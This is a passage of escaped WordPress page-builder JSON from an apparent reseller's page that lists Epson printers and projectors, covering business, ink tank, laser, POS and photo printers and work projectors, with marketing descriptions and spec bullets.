PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ol><li>Epson WorkForce Enterprise WF-C17590\\u00a0<img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/li><\\/ol><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>2.\\u00a0Epson WorkForce Pro WF-C5290\\u00a0<img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>3.\\u00a0Epson WorkForce WF-100\\u00a0<img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4.\\u00a0Epson WorkForce WF-7711\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ol><li>Epson EcoTank L3150\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/li><\\/ol><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>2.\\u00a0Epson L120 Printer\\u00a0<img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>3.\\u00a0Epson M1100 Printer\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ol><li>Epson AcuLaser C9300N\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/li><\\/ol><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0Epson WorkForce AL-M320DN\\u00a0<img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce AL-M8100DN\\u00a0<img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-H6000IV\\u00a0<img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T88V-i\\u00a0<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T70II\\u00a0<img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L1800 A3 Photo Ink Tank Printer<\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L850 Printer\\u00a0<img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L805 Printer\\u00a0<img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2055<img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9761ce4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"df42bcf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"022ecbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ACCENT LIGHTING LASER PROJECTORS<\\/h3><p>Epson LightScene EV-105<img class=\\\"alignnone wp-image-2437\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"225\\\" height=\\\"150\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6edff95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8eec823\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ae075d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e79162d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7a2bfe2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>INK TANK SYSTEM<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><h3>LASER PRINTER<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><p>2.<\\/p><p>3.\\u00a0<\\/p><h3>POS PRINTER<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>\\u00a0<\\/h3><ul><li>\\u00a0<\\/li><\\/ul><p>2.\\u00a03.\\u00a0<\\/p><h1>Projectors for Work<\\/h1><p>Epson has the best projector for your business, from education solutions to conference room projectors.<\\/p><h3>\\u00a0<\\/h3><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>\\u00a0<\\/h3><h3>ULTRA PORTABLE<\\/h3><ol><li>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/li><\\/ol><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><h3>INTERACTIVE<\\/h3><ol><li>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/li><\\/ol><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><p>2.\\u00a0Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><h3>HIGH BRIGHTNESS<\\/h3><ol><li>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/li><\\/ol><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><p>2.\\u00a0Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" 